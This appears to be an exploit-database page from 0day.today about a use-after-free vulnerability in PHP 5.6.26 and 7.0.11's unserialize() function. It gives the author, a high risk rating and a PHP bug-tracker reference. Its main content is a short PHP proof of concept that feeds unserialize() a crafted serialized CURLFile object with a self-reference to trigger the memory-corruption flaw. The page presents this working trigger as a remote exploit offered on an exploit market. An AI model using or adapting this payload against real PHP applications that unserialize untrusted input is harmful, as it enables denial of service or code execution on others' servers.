[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP 5.6.26 and 7.0.11 Use After Free in unserialize() Vulnerability

Author
taoguangchen
Risk
[
Security Risk High
]
0day-ID
0day-ID-25863
Category
remote exploits
Date add
18-10-2016
Platform
php
PoC:
<?php

$poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
unserialize($poc);

?>

References:

https://bugs.php.net/bug.php?id=73147

#  0day.today [2024-11-15]  #